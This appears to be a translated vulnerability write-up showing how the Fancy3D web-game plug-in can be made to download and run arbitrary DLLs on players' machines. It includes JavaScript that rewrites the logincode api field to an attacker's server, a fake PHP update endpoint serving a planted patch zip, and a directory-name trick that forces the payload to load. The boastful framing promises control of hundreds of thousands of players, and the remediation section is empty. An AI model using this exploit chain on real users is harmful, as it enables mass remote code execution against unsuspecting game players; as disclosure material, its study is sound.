How to take over hundreds of thousands of web-game players' computers (Fancy3D game engine remote code execution vulnerability)

Source: Internet
Author: User

The title has to be sexy, the vulnerability type has to hold up, and the self-assessed rank has to be high; that is how you get the lightning.

Over the past few years web games have become more and more popular, to the point of replacing client games. From the early text games to the later JS, Flash and 3D games, the engines have grown ever more mature and the ways of making money ever more clever. Behind the glamour, security is rarely mentioned.
Today we are dropping a blockbuster. (Yes, I am anonymous. Did you find me?)
Do you play XXX? You do? Then you are my zombie.
Do you play XX? No? Have you ever played XXX? You played it for one minute half a year ago? Then you are my zombie.
Do you play XX? No? Do you play XXX? You are a developer? Then you are still my zombie.

Now for the serious description. Oh, sorry, it will be three months before you get to see this.

Fancy3D is a 3D web game engine independently developed by Beijing Qingguo Smart Technology Co., Ltd. During testing it was found that some of its parameters can be controlled at will, which leads to remote command execution. The analysis follows.

Let's start with the game loading page. The game chosen here is Three Kingdoms Wushen, developed by Suzhou Zhengdu Technology Co., Ltd.

To keep things tidy, irrelevant code has been cut.

Game home page: http://s18.37wan.sgws.ate.cn/tapi/v1/otplat/login?platform=xxxxxx

<script src="http://s18.37wan.sgws.ate.cn/proxy/getvjs/x52/18"></script>  <!-- loads the configuration shown below -->
<script src="http://res.ly.sgws.g.1360.com/static/52xiyou/js/logic1.2.js"></script>  <!-- Fancy3D plug-in launch script -->

this.logincode = (function () {
    var box = 'no';
    if (_self.platform == 'X') {
        try {
            window.external.getClientInfo();
            box = 'X';
        } catch (e) {
            box = 'no';
        }
    }
    // '\x26' is '&' and '\/' is '/'; cc and nc are redacted here
    return 'foaparam=lordcrab:\/\/sn=18 servers\x26sa=s18.37wan.sgws.ate.cn:3018\x26tl=1439716841\x26un=p37_18_xutianle2\x26cc=<a certain md5>\x26nc=<signature>\x26dx=\x26ndx=\x26cv=test3\/\x26api=http:\/\/s18.37wan.sgws.ate.cn\/proxy\/getv\/x52\/18\x26xcn=test\x26xcv=3&xdt=' + box + '#http:\/\/s18.37wan.sgws.ate.cn\/proxy\/getv\/x52\/18 a 3 test 1';
}());
// how logincode is used is discussed below

First, http://s18.37wan.sgws.ate.cn/proxy/getvjs/x52/18 returns:

window.gameversion = "1400301";
window.TangRen_AutoPatch = "http://res.ly.sgws.g.1360.com/updateot/TangRen-AutoPatch5.18.zip";
window.fancydownurlx64 = "http://res.ly.sgws.g.1360.com/static/fancy/down64.dll";
window.fancyentryurl = "http://res.ly.sgws.g.1360.com/static/fancy/SangoWebEntry.exe";
window.clientversion = "1.0";
window.versions = "1400229";
window.fancydownurlx86 = "http://res.ly.sgws.g.1360.com/static/fancy/down.dll";
window.entrymd5 = "8cbed3568c343907430a7a4c5b1ac428";
window.mfc = "http://res.ly.sgws.g.1360.com/updateot/mfc.zip";
window.TangRenPluginSetUp = "http://res.ly.sgws.g.1360.com/updateot/TangRenPluginSetUp1.4.zip";
window.fancymd5x64 = "dd6ffd1aedc204efec3a722ec670f176";
window.fancymd5x86 = "aa401a6cb0f487078b75454576eba479";
window.version = "1.0";

This defines some initialisation configuration. For convenience, this configuration is referred to below as "configuration 1".

Now the part of logic1.2.js that starts the plug-in:

// ... omitted above ...
// -----------------------------------------------------
// start the plug-in
function load_fancy_html_obj() {
    // IE loads the ActiveX control by classid; other browsers load the NPAPI plug-in by MIME type
    var attr = _E.browser == 'ie'
        ? 'classid="clsid:b2e8d85e-c0c5-48df-8dbc-1359b339ae32"'
        : 'type="application/fancy-npruntime-fancy3d-plugin"';
    var liburl = window.fancydownurlx86;
    var libmd5 = window.fancymd5x86;
    if (_E.browser == 'ie' && _E.platform == 'x64') {
        liburl = window.fancydownurlx64;
        libmd5 = window.fancymd5x64;
    }
    var tr_pick_url = 'http://' + _G.pickurl + '/pick/multiinfo',
        tr_createTokenUrl = 'http://' + _G.apiHost + '/createtoken?token=' + _G.tr_token,
        tr_createTokenKey = 'none',
        tr_createTokenName = 'none';
    // separator literals between the values appear empty on this page
    var param1 = _G.username + '' + tr_pick_url + '' + tr_createTokenUrl + '' + tr_createTokenKey + '' + tr_createTokenName + '' + _G.logincode;
    // The <object>/<embed> markup concatenated here (carrying attr, liburl, libmd5,
    // exeurl, exemd5, param1 and the game name) did not survive extraction of this page.
    var html = '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '';
    $("#Fancy3d_divbox").html(html);
}
// ... omitted below ...

Important variables (if any of these is wrong, the plug-in does not start or the game cannot run):

attr: selects how the plug-in is loaded, depending on the browser (ActiveX classid for IE, NPAPI MIME type otherwise).

liburl: the first file the plug-in downloads after it starts; from window.fancydownurlx86 (or fancydownurlx64) in configuration 1.

libmd5: as the name says, the MD5 of that file; from window.fancymd5x86 (or fancymd5x64) in configuration 1.

exeurl: the URL of the game's main program; from window.fancyentryurl in configuration 1.

exemd5: the MD5 of the main program; from window.entrymd5 in configuration 1.

param1: the common parameters passed to the plug-in. The important one is _G.logincode, whose origin was shown above.
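To make the trust boundary concrete, here is an added JavaScript example (not code from this page, from Fancy3D or from the game) that parses the logincode string quoted above into its fields, rebuilds it, and rewrites the api field the way the rest of this write-up does. The sample string is constructed from the one on the page: '\x26' and '\/' in the page's JS source are simply '&' and '/' once the literal is evaluated, cc and nc keep the page's redaction placeholders, and xdt is 'no' (the value box takes when window.external.getClientInfo() throws). The meaning of the text after '#' is not documented on the page; it is only copied.

```javascript
'use strict';

// Constructed from the logincode quoted on this page (see the note in the lead-in).
const SAMPLE_LOGINCODE =
  'foaparam=lordcrab://sn=18 servers&sa=s18.37wan.sgws.ate.cn:3018&tl=1439716841' +
  '&un=p37_18_xutianle2&cc=<a certain md5>&nc=<signature>&dx=&ndx=&cv=test3/' +
  '&api=http://s18.37wan.sgws.ate.cn/proxy/getv/x52/18&xcn=test&xcv=3&xdt=no' +
  '#http://s18.37wan.sgws.ate.cn/proxy/getv/x52/18 a 3 test 1';

// Split "foaparam=<scheme>://k=v&k=v...#<fragment>" into its parts. Values are not
// URL-encoded, so a value may itself contain ':' and '/', and only the first '='
// of a pair separates key from value. Field order is kept so the string can be rebuilt.
function parseLogincode(s) {
  const m = /^foaparam=([a-z]+):\/\/([^#]*)(?:#(.*))?$/.exec(s);
  if (!m) throw new Error('not a foaparam logincode');
  const fields = {};
  for (const pair of m[2].split('&')) {
    if (pair === '') continue;
    const eq = pair.indexOf('=');
    if (eq < 0) { fields[pair] = ''; continue; }
    fields[pair.slice(0, eq)] = pair.slice(eq + 1);
  }
  return { scheme: m[1], fields, fragment: m[3] === undefined ? '' : m[3] };
}

// Reassemble in the page's layout so the plug-in still accepts the result.
function buildLogincode(parsed) {
  const body = Object.entries(parsed.fields).map(([k, v]) => k + '=' + v).join('&');
  const tail = parsed.fragment === '' ? '' : '#' + parsed.fragment;
  return 'foaparam=' + parsed.scheme + '://' + body + tail;
}

// The edit the write-up makes: repoint 'api' (and the copy of it that starts the
// fragment) at a server of the attacker's choosing, leaving every other field as is.
function withApi(logincode, apiUrl) {
  const parsed = parseLogincode(logincode);
  const old = parsed.fields.api;
  if (old === undefined) throw new Error('logincode has no api field');
  parsed.fields.api = apiUrl;
  if (parsed.fragment.startsWith(old)) {
    parsed.fragment = apiUrl + parsed.fragment.slice(old.length);
  }
  return buildLogincode(parsed);
}

// The host the client will ask for its update configuration (the getv request):
// it is whatever the page put into the string, with nothing vouching for it.
function updateApiHost(logincode) {
  return new URL(parseLogincode(logincode).fields.api).hostname;
}
```

The point of the round trip is that nothing in the string is bound to the game's origin: sa, api and the fragment are plain text chosen by whoever serves the page, and a page that embeds the same plug-in with a different api value is indistinguishable to the client from the real one.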

The observed process is as follows:

1. Opening the page loads the Fancy3D plug-in.

2. After the plug-in starts, it creates the directory ZDSGGame under C:\Users\User\fancy\.

3. The plug-in downloads liburl (down.dll) and loads it.

4. The plug-in downloads the game's main program SangoWebEntry.exe and starts it.

5. SangoWebEntry.exe requests the api URL from logincode to obtain the version number.

6. SangoWebEntry.exe requests http://s18.37wan.sgws.ate.cn/proxy/getv/x52/18 (the URL from logincode); the response is:

{
  "gameversion": "1400301",
  "TangRen_AutoPatch": "http://res.ly.sgws.g.1360.com/updateot/TangRen-AutoPatch5.18.zip",
  "fancydownurlx64": "http://res.ly.sgws.g.1360.com/static/fancy/down64.dll",
  "fancyentryurl": "http://res.ly.sgws.g.1360.com/static/fancy/SangoWebEntry.exe",
  "clientversion": "1.0",
  "versions": "1400229",
  "fancydownurlx86": "http://res.ly.sgws.g.1360.com/static/fancy/down.dll",
  "entrymd5": "8cbed3568c343907430a7a4c5b1ac428",
  "mfc": "http://res.ly.sgws.g.1360.com/updateot/mfc.zip",
  "TangRenPluginSetUp": "http://res.ly.sgws.g.1360.com/updateot/TangRenPluginSetUp1.4.zip",
  "fancymd5x64": "dd6ffd1aedc204efec3a722ec670f176",
  "fancymd5x86": "aa401a6cb0f487078b75454576eba479",
  "version": "1.0"
}

7. SangoWebEntry.exe extracts the TangRen_AutoPatch URL from that response, downloads the zip and decompresses it into the client directory.

8. SangoWebEntry.exe starts the automatic update from the client directory: it unpacks TangRen-AutoPatch5.18.zip and loads TangRen-AutoPatch.dll.

9. The automatic update completes and the game starts.

From this process it follows that if the content of steps 3, 4 and 6 can be controlled at will, any exe or dll can be downloaded and executed.

Actual testing showed that for the parameters of step 3 (liburl) and step 4 (exeurl), the plug-in refuses to run as soon as the domain name is changed, so a check is evidently applied there.

The content of step 6, however, comes from http://s18.37wan.sgws.ate.cn/proxy/getv/x52/18, and that URL is taken from logincode (its api field).

logincode is controllable, and as long as its format is preserved the plug-in reads and loads it correctly. So the test environment is set up as follows:

First, write a TangRen-AutoPatch.dll as the PoC.

Package it as tangren-autopatch5.18.zip and put it in the web directory.

Then create a PHP file:

<?php
// Fake getv API. The version query is served from here as well and simply gets
// 123; every other request gets a configuration whose TangRen_AutoPatch points at
// our own zip. The remaining fields only need to look plausible.
if (isset($_GET['type']) && $_GET['type'] === 'gameversion') {
    die('123');
} else {
    echo '{"gameversion":"1400303",'
       . '"TangRen_AutoPatch":"http://localhost/updateot/TangRen-AutoPatch5.18.zip",'
       . '"fancydownurlx64":"http://localhost/static/fancy/down64.dll",'
       . '"fancyentryurl":"http://localhost/static/fancy/SangoWebEntry.exe",'
       . '"clientversion":"1.1",'
       . '"versions":"1400303",'
       . '"fancydownurlx86":"http://localhost/static/fancy/down.dll",'
       . '"entrymd5":"9cbed3568c343907430a7a4c5b1ac428",'
       . '"mfc":"http://localhost/updateot/mfc.zip",'
       . '"TangRenPluginSetUp":"http://localhost/TangRenPluginSetUp1.4.zip",'
       . '"fancymd5x64":"ghost",'
       . '"fancymd5x86":"ghost",'
       . '"version":"1.0"}';
}

The important part is

"TangRen_AutoPatch": "http://localhost/updateot/TangRen-AutoPatch5.18.zip"

Then edit the game home page in the browser so that logincode points at this file, and... nothing happens.

Checking the plug-in log shows that TangRen_AutoPatch is only downloaded and executed when the game is installed for the first time (or on a version update? I did not study that here).

So the game has to be loaded for the first time. Look again at step 2 of the first-load process:

2. After the plug-in starts, it creates the directory ZDSGGame under C:\Users\User\fancy\.

Does ZDSGGame look familiar? When the page loads the plug-in, this is the value passed in the game parameter:

var html = '' + '' +   // the <object>/<embed> markup carrying the game parameter was stripped from this page

On a hunch, I changed ZDSGGame to ZDSGGame1 and opened the page in the browser again. About five seconds after the refresh, the familiar calculator appeared.

Checking C:\Users\User\fancy\ showed that a ZDSGGame1 directory had been created.

Postscript:

Many popular games on the market, including Dark Light Buddha Ben Dao and others, use this plug-in. Although the exact process differs slightly from game to game, they all share the same web plug-in:

classid: b2e8d85e-c0c5-48df-8dbc-1359b339ae32

So if you have ever played any game that uses this plug-in, you can be attacked; that includes the developers who installed it. The title is not an exaggeration.

Because the plug-in is cross-browser, the test runs the plug-in successfully in Firefox, IE and 360 Browser in speed mode (and compatibility mode).

Solution:

See the full details for the complete set.
